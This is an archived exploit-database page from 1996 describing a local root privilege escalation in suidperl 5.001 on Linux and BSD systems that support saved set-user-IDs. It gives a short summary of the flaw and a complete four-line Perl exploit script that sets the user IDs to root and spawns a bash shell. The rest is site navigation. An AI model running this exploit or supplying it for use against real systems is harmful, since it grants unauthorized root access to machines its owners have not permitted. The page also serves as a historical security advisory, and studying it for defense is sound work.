suid_perl 5.001 vulnerability

Summary
Description:On systems that support saved set-user-IDs, perl isn't thorough enough in giving up its root priviledges.
Author:Jon Lewis (jlewis@inorganic5.fdt.net) wrote this basic exploit, though it has been modified. It is unclear who found the hole.
Compromise: root (local)
Vulnerable Systems:Systems that support saved set-user-IDs and set-group-IDs and have suid_perl 5.001 (and possibly below) installed. Many linux and *BSD boxes.
Date:June 1996
Details

Exploit: 
#!/usr/bin/suidperl -U
$ENV{PATH}="/bin:/usr/bin";
$>=0;$<=0;
exec("/bin/bash");
More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]